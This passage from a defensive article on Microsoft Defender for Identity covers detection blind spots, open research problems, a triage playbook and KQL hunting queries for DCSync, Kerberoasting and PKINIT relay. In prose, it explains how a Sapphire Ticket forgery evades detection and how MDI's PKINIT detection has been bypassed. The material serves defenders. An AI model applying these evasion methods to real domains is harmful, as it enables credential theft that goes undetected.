&lt;p&gt;&lt;strong&gt;SpecterOps BloodHound Enterprise (BHE)&lt;/strong&gt; is the commercial form of the BloodHound 2016 graph model that Andy Robbins, Rohan Vazarkar, and Will Schroeder published at DEF CON 24 [@defcon-six-degrees][@bloodhound-github-specterops][@neo4j-bh]. Pure graph attack-path exposure model: BHE maps the paths that &lt;em&gt;exist&lt;/em&gt; (Tier Zero hygiene, principal-to-principal cross-domain trust paths, Entra to on-prem pivots) rather than alerts on attacks in flight [@specterops-bhe]. Complementary to MDI: BHE tells you the attack path exists in the directory, MDI tells you someone is walking it right now. The SpecterOps team&apos;s &lt;em&gt;Certified Pre-Owned&lt;/em&gt; whitepaper (June 2021) by Will Schroeder and Lee Christensen is the source of the &lt;a href=&quot;https://paragmali.com/blog/certified-pre-owned-ad-cs-and-active-directorys-second-trust/&quot; rel=&quot;noopener&quot;&gt;ESC1-ESC8 vocabulary&lt;/a&gt; that downstream MDI ADCS posture assessments map to [@specterops-cpo-pdf][@specterops-cpo-blog].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Microsoft Sentinel native UEBA&lt;/strong&gt; is the SIEM-side behavioural-baselines product over the broader event corpus that Sentinel ingests. Sentinel UEBA uses machine learning to build dynamic behavioural profiles for users, hosts, IP addresses, applications, and other entities, with named data-source connectors including Defender for Identity [@mslearn-sentinel-ueba]. Sentinel UEBA is the &quot;outside the identity tables&quot; layer -- detection that needs to correlate identity signal with email, endpoint, network, and SaaS signal lives there rather than in the identity tables themselves. The Defender XDR-to-Sentinel connector unifies the surfaces [@mslearn-sentinel-defender-connector].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open-source detection stacks&lt;/strong&gt; -- Sigma rules deployed against Sentinel, Splunk, or Elastic, plus Velociraptor and Wazuh -- can match many of MDI&apos;s pattern-based alerts but cannot match MDI&apos;s per-principal behavioural baselines without significant in-house investment [@sigmahq-github]. The SigmaHQ rule corpus contains over 3,000 detection rules in a vendor-neutral SIEM format. Olaf Hartong&apos;s FalconForce team publishes the &lt;em&gt;FalconFriday&lt;/em&gt; hunting-query repository (MDE-schema KQL queries for DLL injection, COM hijacking, LOLBins, LDAP anomalies, and SMB NULL sessions) -- the operator-side companion to community-built detection libraries [@github-falconfriday][@falconforce-blog].&lt;/p&gt;
&lt;p&gt;MDI is the high-coverage, low-effort identity-threat detection product if you already have Microsoft 365 E5 or E5 Security. The third-party products in this market win on differentiation -- inline enforcement, change-tracking, exposure-graph mastery -- rather than baseline coverage. The interesting question for an architect in 2026 is not which to buy. The interesting question is what MDI, by design, cannot see at all.&lt;/p&gt;
&lt;h2&gt;8. Theoretical Limits -- the Five Structural Ceilings&lt;/h2&gt;
&lt;p&gt;There are attacks no version of MDI will ever detect. Not because Microsoft has not shipped the alert yet, and not because the engineering team has not gotten around to it. Because the alert is structurally impossible.&lt;/p&gt;
&lt;p&gt;Five named ceilings, each anchored to a primary source. Together they are the residual blind-spot inventory every operator should be able to name from memory.&lt;/p&gt;

flowchart TD
    subgraph causes [&quot;Attacker-side cause&quot;]
        C1[&quot;OS does not expose&lt;br /&gt;the credential operation&quot;]
        C2[&quot;Forged ticket is&lt;br /&gt;cryptographically identical&quot;]
        C3[&quot;Wire traffic is wrapped&lt;br /&gt;in an encrypted channel&quot;]
        C4[&quot;Attack pivots through&lt;br /&gt;a forest without a sensor&quot;]
        C5[&quot;Attacker uses real DA&lt;br /&gt;real credentials&quot;]
    end
    subgraph gaps [&quot;Defender-side gap&quot;]
        G1[&quot;Credential Guard wall&quot;]
        G2[&quot;Sapphire Ticket class&quot;]
        G3[&quot;Encrypted-channel DCSync&quot;]
        G4[&quot;Cross-forest tail&quot;]
        G5[&quot;Legitimate principal&lt;br /&gt;non-detection&quot;]
    end
    C1 --&amp;gt; G1
    C2 --&amp;gt; G2
    C3 --&amp;gt; G3
    C4 --&amp;gt; G4
    C5 --&amp;gt; G5
&lt;p&gt;&lt;strong&gt;Ceiling 1 -- the Credential Guard wall.&lt;/strong&gt; Anything the operating system itself cannot see is invisible to MDI. The DCSync class is the canonical example with a twist: &lt;a href=&quot;https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&lt;/a&gt; isolates the LSASS process so that credentials in memory cannot be scraped from a compromised endpoint, but it does not prevent DRSUAPI-level secret extraction against the DC because the DRSUAPI replication interface is &lt;em&gt;supposed&lt;/em&gt; to return password hashes to legitimate replication partners. MDI catches DCSync by detecting the wire-side pattern (DRSUAPI from a non-DC source), not by Credential Guard&apos;s protection. Anything the OS does not expose in event log, wire traffic, or instrumented API -- a custom kernel driver that reads secrets through a side channel, a hypervisor-level credential extraction on a non-Secured-core host -- is, by construction, outside MDI&apos;s data layer.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ceiling 2 -- forged-ticket cryptographic indistinguishability, the Sapphire Ticket.&lt;/strong&gt; This is the most important ceiling, and the one whose permanence the rest of this section orbits.&lt;/p&gt;

A forged Kerberos Ticket Granting Ticket whose Privileged Attribute Certificate (PAC) is a verbatim copy of a legitimate principal&apos;s PAC, obtained via the S4U2self plus User-to-User PAC-copy flow against the target principal and then encrypted with the stolen `krbtgt` key. The technique was disclosed by Charlie Bromberg (Synacktiv / Shutdown) in October 2022 and documented on The Hacker Recipes wiki [@hackerrecipes-sapphire]. The defining property: every byte of the forged ticket&apos;s PAC matches the byte pattern of a ticket the genuine KDC would have issued for the legitimate principal, including the group SID set, the user ID, the logon time, and the authorisation-data fields. The classic Golden Ticket leaves PAC anomalies that MDI&apos;s *Suspected Golden Ticket usage (forged authorization data)* alert fires on; the Sapphire Ticket leaves no PAC anomaly because there is no anomaly to leave.

The Sapphire Ticket attack obtains a target principal&apos;s PAC via the S4U2self plus User-to-User PAC-copy technique -- a Kerberos protocol flow Microsoft published as part of MS-SFU and MS-KILE -- which extracts a genuine PAC into a usable form without ever needing to authenticate as the target. The attacker then forges a new ticket whose PAC is the captured PAC, encrypted with the stolen `krbtgt` key. The mechanical sequence is: S4U2self against the target produces a ticket containing the target&apos;s PAC; the U2U flow lets the attacker decrypt the embedded PAC blob; the attacker then mints a fresh TGT around that PAC with the genuine signing key. The KDC&apos;s signature checks pass because the signing key is real, and the PAC&apos;s structural fields pass because they were lifted from a ticket the genuine KDC just issued. Only the original credential compromise that produced the `krbtgt` hash leaves a trail.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Cryptographic indistinguishability is a permanent class. No future MDI release fixes the Sapphire Ticket without breaking Kerberos itself.&lt;/p&gt;
&lt;/blockquote&gt;

Rotate `krbtgt` twice on a defined cadence -- 90 days is common; some Tier Zero playbooks rotate every 30 days. The &quot;twice&quot; is non-optional: a single rotation leaves the prior `krbtgt` key valid for the duration of any tickets the KDC has previously issued, so the stolen key is still usable for up to 10 hours (or longer, on `MaxRenewAge` extensions). Combine with Authentication Policy Silos for Tier Zero service accounts, Tier Zero access reviews, and Privileged Access Workstations for any administrator who can read `krbtgt`. None of these closes the Sapphire Ticket; together they shrink the window in which a stolen key remains weaponisable. Sample PowerShell for the double rotation is in the Microsoft-published `Reset-KrbTgt` script in the GitHub samples repository [@msdefender-id-github].
&lt;p&gt;&lt;strong&gt;Ceiling 3 -- the encrypted-channel DCSync class.&lt;/strong&gt; When DRSUAPI is wrapped in a transport the on-DC capture cannot decode -- DCSync over LDAPS via a SPN-bound impersonation chain, for instance -- the wire-side pattern recognition that powers the External ID 2006 alert degrades. The structural detector in Section 6.3 catches the unencrypted case; the encrypted case requires either a different observation surface (the DRSUAPI handler&apos;s own instrumentation) or behavioural baselining on the post-fact replication-log signal. MDI&apos;s coverage in this case is partial, not complete.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ceiling 4 -- the cross-forest under-instrumentation tail.&lt;/strong&gt; MDI sees the forests its sensors are deployed in. Pivot through an external trust to a forest without MDI coverage and the signal is incomplete -- the attacker&apos;s pre-pivot reconnaissance, the actual trust traversal, and any post-pivot actions on the trusting side that do not also touch an MDI-monitored forest will be invisible. This is a deployment property, not a product property: a tenant with MDI on every forest in its environment does not have this ceiling. A tenant whose acquisition portfolio includes three forests it does not yet monitor does.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ceiling 5 -- legitimate-principal compromise non-detection.&lt;/strong&gt; When the attacker uses a real Domain Admin&apos;s real credentials, every action is behaviourally indistinguishable from the legitimate principal unless timing, geolocation, or device fingerprint breaks the baseline. The 2025 and 2026 &lt;em&gt;Suspected session cookie theft&lt;/em&gt; and related XDR-format alerts close part of this gap by adding behavioural side channels that the older Azure ATP alert catalogue did not cover [@mslearn-mdi-alerts-xdr]. The residual is permanent: a sufficiently disciplined attacker operating from the legitimate principal&apos;s normal workstation, during the legitimate principal&apos;s normal hours, doing things the legitimate principal might plausibly do, is, by construction, indistinguishable from the legitimate principal.&lt;/p&gt;
&lt;p&gt;A sixth honourable mention sits adjacent to these five: &lt;strong&gt;out-of-band physical access&lt;/strong&gt; -- a stolen &lt;code&gt;Ntds.dit&lt;/code&gt; backup, an attacker-controlled DC&apos;s offline export, supply-chain firmware compromise on the DC hardware -- is outside the data layer MDI operates over. The hardware-trust-root community owns this class of mitigation, not the identity-threat detection community.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The five structural ceilings are knowable, not surprises. A SOC that names them ahead of time has a better incident-response runbook than one that does not -- specifically, the runbook for &quot;we just realised the attacker used a Sapphire Ticket&quot; is fundamentally different from the runbook for &quot;MDI fired and we ignored it.&quot; The first runbook starts with &lt;code&gt;krbtgt&lt;/code&gt; rotation and Tier Zero hygiene review; the second starts with disciplinary review and SOAR-rule tuning. Knowing which runbook to pick depends on naming the ceiling correctly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;These five named residuals are why the rest of the article exists. If MDI caught everything, the operator playbook in Section 10 would be unnecessary. Because MDI does not, and because the gaps are knowable, the playbook in Section 10 is the difference between MDI as a licence line item and MDI as a working part of the SOC&apos;s day. But before the playbook, one last open-problem inventory: where is the research roadmap actually working?&lt;/p&gt;
&lt;h2&gt;9. Open Problems -- What the Research Roadmap Is Working On&lt;/h2&gt;
&lt;p&gt;Five open problems sit between the 2026 floor and a hypothetically perfect identity-threat detector. Each one has a current best partial result and a citation. None of them is closed.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open Problem 1 -- the post-PKINIT NTLM-relay class beyond ESC8.&lt;/strong&gt; Synacktiv&apos;s &lt;em&gt;Understanding and evading Microsoft Defender for Identity PKINIT detection&lt;/em&gt; paper (Guillaume Andre, 2024) reverse-engineered MDI&apos;s PKINIT-class detection: MDI fingerprints offensive-tool-generated AS-REQ messages by the encryption types they advertise, which differ from the encryption-type list a legitimate Windows API PKINIT request generates [@synacktiv-pkinit-evasion][@synacktiv-pkinit-evasion-archive]. The companion &lt;code&gt;Invoke-RunAsWithCert&lt;/code&gt; PowerShell tool generates AS-REQ messages via the Windows API itself, producing requests structurally identical to legitimate enterprise PKINIT authentication and bypassing the fingerprint-based detection [@synacktiv-runascert-gh][@deepwiki-runascert]. Aura Security&apos;s follow-on writeup confirms the technique against the current MDI version and walks through modifying Certipy to produce matching AS-REQ shapes [@aurainfosec-mdi-pkinit]. The partial mitigation in 2026 is the additional posture-side coverage in the nine MDI Certificates assessments, which closes some of the configurations the offensive tools target [@mslearn-mdi-certificates-posture]. The runtime detection arms race continues.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open Problem 2 -- the graph-layer transition from SAM-R LMP to Identity Explorer.&lt;/strong&gt; Section 6.4 covered the deprecation of SAM-R-based LMP discovery in May 2025 (MC1073068) and the two replacement surfaces: the Defender XDR attack-path exploration driven by Defender for Cloud&apos;s CSPM engine, and the April 2026 Identity Explorer Preview on the Sentinel data lake [@handsontek-mc1073068][@mslearn-defenderforcloud-attack-path][@mslearn-mdi-whats-new][@mslearn-xdr-hunting-graph]. The honest open question is whether either surface reproduces, in 2026, the operator workflows the seven-year-old SAM-R-derived LMP report had built up around itself. The Defender XDR hunting graph is richer than the LMP report ever was, but its data model is different; the Identity Explorer is closer in spirit but in Preview rather than GA.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open Problem 3 -- the Sentinel data lake correlation and the Identity Explorer GA path.&lt;/strong&gt; Microsoft Sentinel data lake, the cross-product cold-storage and analytics layer, went public preview in 2025 and ships with up to 12 years of retention in Parquet format, a clean separation of storage and compute, and KQL plus Jupyter notebook query surfaces [@mslearn-sentinel-datalake][@mstc-sentinel-datalake-preview]. Identity Explorer is the first identity-specific surface built on top of the data lake; it is in Preview as of April 2026 with no GA date published. The open problem is whether the data-lake-tier correlation can match the alert-tier MDI quality for long-running attacker dwell -- the &lt;em&gt;months between Sapphire Ticket use and discovery&lt;/em&gt; class -- without producing more noise than signal.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open Problem 4 -- the MDI evasion research arms race.&lt;/strong&gt; Synacktiv&apos;s two papers (the sensor primer by Andre and Benassouli in 2022; the PKINIT evasion paper by Andre in 2024) plus the operator notes on alert-timing exploitation that show up in adsecurity.org and SpecterOps content are the public record of the offensive-research community&apos;s targeting of MDI specifically [@synacktiv-primer-mdi][@synacktiv-primer-mdi-archive][@synacktiv-pkinit-evasion][@synacktiv-pkinit-evasion-archive]. FalconForce&apos;s reverse-engineering of the MDE sensor (via Olaf Hartong&apos;s MDE Internals series) is the methodological precedent for the same approach against MDI; the FalconForce blog and the FalconFriday hunting-query repository are the operator-facing primaries [@falconforce-mde-0x02][@falconforce-mde-0x03][@falconforce-blog][@github-falconfriday][@github-olafhartong]. The Charlie Bromberg Sapphire Ticket disclosure (October 2022) is the cryptographic-attack-class research that Section 8&apos;s third ceiling rests on [@hackerrecipes-sapphire]. The arms-race property is permanent; the defensive product team&apos;s job is to keep the detection-shipping cadence faster than the evasion-shipping cadence, which the cloud rewrite (see Section 5) made structurally possible.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open Problem 5 -- the non-Windows directory coverage tail.&lt;/strong&gt; MDI covers Active Directory and (via the Microsoft Entra Connect sensor) the on-prem-to-Entra-ID sync surface. Native Entra ID attacks (token theft against Entra ID itself, OAuth consent phishing, Conditional Access bypass) are covered by Defender for Cloud Apps and Entra ID Protection, not by MDI. The boundary between MDI&apos;s scope and the adjacent products is operationally meaningful: a SOC operator reading &quot;MDI did not fire&quot; on an Entra-ID-only attack should not conclude the attack went undetected -- another product likely did fire, in another part of the same Defender XDR portal. The unified incident queue stitches the alerts together; the operator&apos;s mental model has to know which sensor surface to look at when triaging.&lt;/p&gt;
&lt;p&gt;The article does &lt;em&gt;not&lt;/em&gt; claim &quot;BloodHound CE forced MDI to add ADCS detections in 2024.&quot; The framing is parallel evolution: as BloodHound CE expanded ADCS attack-path coverage in 2024-2025, MDI extended its ADCS posture assessments and PKINIT-class runtime detections during the same window. The two product communities watch each other; neither one &quot;forces&quot; the other.&lt;/p&gt;
&lt;p&gt;The roadmap is real, the build-out is in progress, and the operator decision in 2026 is not &quot;wait for the perfect product.&quot; It is &quot;deploy what works now, and cover the residuals with KQL.&quot;&lt;/p&gt;
&lt;h2&gt;10. The MDI Deployment and Triage Playbook&lt;/h2&gt;
&lt;p&gt;Four lanes, mapped to four operator personas: the architect who designs the sensor footprint, the SOC analyst who triages the alerts, the threat hunter who writes the KQL that fills the gaps, and everyone who needs to know what does not work.&lt;/p&gt;
&lt;h3&gt;Lane 1 -- sensor placement and prerequisite hygiene&lt;/h3&gt;
&lt;p&gt;Deploy the &lt;strong&gt;v3.x sensor on every domain controller running Windows Server 2019 or later&lt;/strong&gt;, paired with the MDE agent. The deployment path is the Microsoft Defender portal&apos;s migration wizard or the standalone install via the MDE agent&apos;s onboarding flow [@mslearn-mdi-deploy-sensor-v3][@modernsec-v3x][@jeffreyappel-v2v3].&lt;/p&gt;
&lt;p&gt;Deploy the &lt;strong&gt;v2.x sensor&lt;/strong&gt; on every AD FS federation server, every AD CS online issuing certificate authority, and every Microsoft Entra Connect server (both active and staging), unless those roles already run on a domain controller covered by a v3.x sensor with the May 2026 identity-role extension enabled [@mslearn-mdi-prereq-sensor-v2][@mslearn-mdi-whats-new].&lt;/p&gt;
&lt;p&gt;Configure the &lt;strong&gt;required Windows audit subcategories&lt;/strong&gt; via the Group Policy &lt;em&gt;Subcategory Settings&lt;/em&gt; path that the MDI event-collection page enumerates -- &lt;em&gt;Audit Credential Validation&lt;/em&gt;, &lt;em&gt;Audit Kerberos Authentication Service&lt;/em&gt;, &lt;em&gt;Audit Kerberos Service Ticket Operations&lt;/em&gt;, &lt;em&gt;Audit Logon&lt;/em&gt;, &lt;em&gt;Audit Directory Service Access&lt;/em&gt;, &lt;em&gt;Audit Computer Account Management&lt;/em&gt;, plus the additional subcategories for AD CS and AD FS roles. The v3.x sensor includes an &lt;em&gt;Automatic Windows auditing configuration&lt;/em&gt; toggle that uses the Windows LSA audit-policy APIs to set the subcategories directly, eliminating the GPO step [@mslearn-mdi-event-collection].&lt;/p&gt;
&lt;p&gt;Set the &lt;strong&gt;MDI Action Account&lt;/strong&gt; in the Defender portal. The default is LocalSystem impersonation on the sensor host, which works for response actions targeting AD objects (force password reset, disable user). A gMSA-based Action Account is the alternative for tenants that want least-privilege response identities scoped per workspace [@mslearn-mdi-action-accounts][@mslearn-mdi-remediation-actions]. Avoid configuring the same gMSA across multiple sensor hosts -- the documented anti-pattern is to use one Action Account for DC-side actions only.&lt;/p&gt;
&lt;p&gt;Verify the &lt;strong&gt;Microsoft Defender portal role assignments&lt;/strong&gt; so that SOC analysts have the correct read-and-respond permissions on identity alerts. The Microsoft Defender for Identity enterprise application (ID &lt;code&gt;60ca1954-583c-4d1f-86de-39d835f3e452&lt;/code&gt;) is the consent surface for the response actions; tenants that have not granted consent will see &quot;remediation action unavailable&quot; on identity-targeted incidents [@mslearn-mdi-remediation-actions].&lt;/p&gt;
&lt;h3&gt;Lane 2 -- alert triage SLAs&lt;/h3&gt;
&lt;p&gt;The triage matrix maps alert category to response-time target and the named SOC role that owns triage. Numbers below are typical Tier 1 / Tier 2 SOC targets; tune to your environment&apos;s incident-response policy.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Alert category&lt;/th&gt;
&lt;th&gt;Response-time target&lt;/th&gt;
&lt;th&gt;Owning SOC role&lt;/th&gt;
&lt;th&gt;Notes&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;DCSync, DCShadow, Golden Ticket&lt;/td&gt;
&lt;td&gt;1 hour&lt;/td&gt;
&lt;td&gt;Tier 2 (privileged-account-compromise specialist)&lt;/td&gt;
&lt;td&gt;Treat as confirmed compromise pending evidence to the contrary&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AS-REP Roasting, Kerberoasting&lt;/td&gt;
&lt;td&gt;4 hours&lt;/td&gt;
&lt;td&gt;Tier 2&lt;/td&gt;
&lt;td&gt;Higher-FP class; verify offending principal pattern before escalation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NTLM relay (ESC8 class)&lt;/td&gt;
&lt;td&gt;4 hours&lt;/td&gt;
&lt;td&gt;Tier 2&lt;/td&gt;
&lt;td&gt;ADCS-aware; coordinates with CA team&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reconnaissance (LDAP / SMB / DNS)&lt;/td&gt;
&lt;td&gt;24 hours&lt;/td&gt;
&lt;td&gt;Tier 1&lt;/td&gt;
&lt;td&gt;Highest-FP class; allowlist legitimate scanners&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Honeytoken activity&lt;/td&gt;
&lt;td&gt;1 hour&lt;/td&gt;
&lt;td&gt;Tier 1 plus Tier 2 escalation&lt;/td&gt;
&lt;td&gt;Near-zero FP; any hit is investigation-worthy&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Two false-positive cleanup patterns appear in nearly every tenant. The Azure AD Connect Cloud Sync service principal -- &lt;code&gt;MSOL_&lt;/code&gt; plus an 8-character random suffix -- legitimately performs DRSUAPI-like operations as part of the hybrid identity sync flow, and will fire DCSync-class alerts unless allowlisted. Legitimate vulnerability scanners (Tenable, Rapid7, Qualys) perform authenticated enumeration that triggers the LDAP and SMB reconnaissance alerts; scanner IPs go in an exclusion list per the Defender XDR portal&apos;s identity-alert tuning surface.&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;MDI Action Accounts and Remediation Actions&lt;/strong&gt; surface lets the responder disable a user, force a password reset, revoke an Entra ID session, or mark an account as compromised -- triggered manually from the alert flow or automatically via the Defender XDR &lt;em&gt;automatic attack disruption&lt;/em&gt; engine, which requires 99 percent or higher detector precision before taking containment action [@mslearn-xdr-attack-disruption][@mslearn-mdi-remediation-actions][@mslearn-xdr-investigate-users]. Automatic attack disruption is opt-in per containment action; the conservative default leaves analyst confirmation in the loop for password-reset-class actions and automates disable-user only on the highest-precision detector classes.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The cloud-side analytics pipeline aggregates signal across the per-principal baseline window before deciding to emit. Empirically the alert latency is &lt;strong&gt;minutes-cadence, not seconds-cadence&lt;/strong&gt;. Incident response runbooks that assume sub-second alert arrival will be wrong; the operator clock starts when the alert hits the Defender XDR queue, which is itself minutes after the wire-side event. Plan for this in the SLA matrix above -- the &quot;1 hour&quot; target for DCSync starts from the alert timestamp, not the attack timestamp, and the attack itself may have happened five or ten minutes earlier. The Microsoft alerts-overview page is explicit that MDI is &quot;not designed to serve as an auditing or logging solution that captures every single operation or activity on the servers where the sensor is installed; it only captures the data required for its detection and recommendation mechanisms&quot; [@mslearn-mdi-alerts-overview].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Lane 3 -- advanced-hunting queries that fill the gaps&lt;/h3&gt;
&lt;p&gt;Three structural detectors in KQL form, each one targeting a class the named alerts can miss. Each query names the table, the columns, and the threshold tuning the operator will need.&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;structural DCSync detector&lt;/strong&gt; runs against &lt;code&gt;IdentityDirectoryEvents&lt;/code&gt; and catches the encrypted-channel case the External ID 2006 alert may miss:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-kql&quot;&gt;IdentityDirectoryEvents
| where Timestamp &amp;gt; ago(24h)
| where ActionType == &quot;DRSReplicate&quot;
| extend SourceIP = tostring(parse_json(AdditionalFields).SourceIPAddress)
| where SourceIP !in (&quot;10.0.1.10&quot;, &quot;10.0.1.11&quot;, &quot;10.0.1.12&quot;)   // tenant DC IPs
| where AccountName !startswith &quot;MSOL_&quot; and AccountName !in (&quot;ADConnectSync&quot;)
| project Timestamp, AccountName, SourceIP, TargetDeviceName, AdditionalFields
| order by Timestamp desc
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Threshold tuning: keep the time window short (24 hours) for daily triage. Cleanup principals (&lt;code&gt;MSOL_*&lt;/code&gt;, &lt;code&gt;ADConnectSync&lt;/code&gt;, plus any per-tenant sync identities) go in the &lt;code&gt;!startswith&lt;/code&gt; and &lt;code&gt;!in&lt;/code&gt; clauses. The query produces a clean queue of &quot;DRSUAPI replication from a host that should not be doing DRSUAPI.&quot; False-positive class: legitimate Azure AD Connect Cloud Sync service principals; resolve by adding the principal to the allowlist.&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;slow-burn Kerberoasting detector&lt;/strong&gt; runs against &lt;code&gt;IdentityLogonEvents&lt;/code&gt; and catches the rate-limited Kerberoast pattern that modern attackers use to stay below the MDI behavioural-baseline threshold:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-kql&quot;&gt;IdentityLogonEvents
| where Timestamp &amp;gt; ago(7d)
| where Protocol == &quot;Kerberos&quot;
| where ActionType == &quot;ServiceTicketRequest&quot;
| extend EncType = tostring(parse_json(AdditionalFields).EncryptionType)
| where EncType in (&quot;RC4-HMAC&quot;, &quot;DES-CBC-MD5&quot;)
| summarize SpnCount = dcount(TargetSpn), SpnList = make_set(TargetSpn) by AccountName, bin(Timestamp, 1d)
| where SpnCount &amp;gt; 5     // tune per tenant baseline
| order by Timestamp desc, SpnCount desc
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Threshold tuning: the &lt;code&gt;SpnCount &amp;gt; 5&lt;/code&gt; threshold is the load-bearing knob. Tenants with legitimate operational accounts that request many SPNs per day (privileged service accounts running scheduled tasks across many target hosts) will need a higher threshold and an allowlist. The seven-day window catches the slow-burn pattern that a one-hour window misses.&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;PKINIT-relay structural detector&lt;/strong&gt; runs against &lt;code&gt;IdentityLogonEvents&lt;/code&gt; and watches for AS-REQ with PA-PK-AS-REQ pre-auth coming from unexpected client subnets:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-kql&quot;&gt;IdentityLogonEvents
| where Timestamp &amp;gt; ago(24h)
| where Protocol == &quot;Kerberos&quot;
| where ActionType == &quot;InitialAuthentication&quot;
| extend PreAuth = tostring(parse_json(AdditionalFields).PreAuthType)
| where PreAuth == &quot;PA-PK-AS-REQ&quot;
| extend ClientSubnet = strcat(split(IPAddress, &quot;.&quot;)[0], &quot;.&quot;, split(IPAddress, &quot;.&quot;)[1])
| where ClientSubnet !in (&quot;10.0.5&quot;, &quot;10.0.6&quot;)    // legitimate smartcard subnets
| project Timestamp, AccountName, IPAddress, DeviceName, AdditionalFields
| order by Timestamp desc
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Threshold tuning: PKINIT is legitimate when smartcard logon is in use. Identify the legitimate smartcard-issuing subnets and add them to the &lt;code&gt;!in&lt;/code&gt; clause. The residual queue is PKINIT from unexpected sources -- the structural pattern behind both the post-ESC8 NTLM-relay class and the Synacktiv &lt;code&gt;Invoke-RunAsWithCert&lt;/code&gt; evasion class.&lt;/p&gt;
&lt;p&gt;Tenants that want the alert and event corpus in their SIEM as well as in Defender XDR should configure the &lt;strong&gt;MDI to Microsoft Sentinel connector&lt;/strong&gt; through the Defender XDR-to-Sentinel integration; the connector is auto-enabled when Sentinel is onboarded to the Defender portal [@mslearn-sentinel-defender-connector].&lt;/p&gt;
&lt;h3&gt;Lane 4 -- what does NOT work&lt;/h3&gt;
&lt;p&gt;Five named operator myths, each refuted with a one-paragraph structural reason.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Myth 1: &quot;MDI without the DC sensor still catches Kerberos attacks via the Entra ID side.&quot;&lt;/strong&gt; Wrong. The Kerberos protocol layer is on-prem; the analytics require on-DC capture of the AS-REQ / TGS-REQ / AP-REQ exchange. Entra ID&apos;s side of the hybrid auth flow does not carry the same protocol detail. A tenant with MDI licensed but the sensor not deployed on the DCs has no Kerberos detection at all -- the licensed state is necessary but not sufficient.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Myth 2: &quot;Disabling the v2.x sensor on AD FS is fine since it is covered by the DC sensor.&quot;&lt;/strong&gt; Wrong. The AD FS authentication flow generates federation-side events (SAML assertions, OAuth tokens, the Application and Security event logs that AD FS itself writes) that the DC sensor does not see. AD FS deserves its own sensor unless the AD FS role is collapsed onto a domain controller, in which case the May 2026 v3.x identity-role extension covers it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Myth 3: &quot;Defender for Endpoint covers what MDI covers.&quot;&lt;/strong&gt; Wrong. MDE catches endpoint behaviour -- process creation, file access, network connections, registry writes. MDI catches protocol-level Kerberos, NTLM, LDAP, and DRSUAPI patterns. The two products share an agent surface in the v3.x architecture, but the &lt;em&gt;signal classes&lt;/em&gt; are different. An MDE-only deployment will not catch a DCSync from a workstation if MDI is not licensed and the sensor is not deployed; the MDE agent on the DC sees the local process activity but not the wire-side replication call&apos;s source.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Myth 4: &quot;MDI alerts are real-time.&quot;&lt;/strong&gt; Wrong. As Callout in Lane 2 above. The cloud-side batched-emission cadence is minutes-not-seconds, and incident response runbooks need to account for it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Myth 5: &quot;MDI requires no tuning.&quot;&lt;/strong&gt; Wrong. Every environment has unique false-positive patterns from internal tooling that need exclusions. Microsoft ships the default detector thresholds; tenants tune them through the Defender XDR portal&apos;s identity-alert configuration surface. A tenant that has not tuned the recon-alert allowlist for its vulnerability scanners will receive far more noise than signal.&lt;/p&gt;
&lt;p&gt;Coverage, triage, KQL, and humility about what does not work. The four lanes are the difference between MDI as a licence item on a renewal sheet and MDI as a working part of the SOC&apos;s day.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions and Closing&lt;/h2&gt;
&lt;p&gt;Six questions that come up every time MDI is on a whiteboard, each in the misconception-removal pattern: wrong answer named first, then refuted.&lt;/p&gt;

No. See the *common misreading worth fixing* Callout in Section 4: graph-anchored attack-path evaluation in Microsoft&apos;s defensive stack originates in ATA 1.9 (March 2018), and the 2022 anchor in operator memory is the start of the SAM-R-discovery deprecation arc that culminated in MC1073068 in May 2025 [@mslearn-ata-1-9][@handsontek-mc1073068].

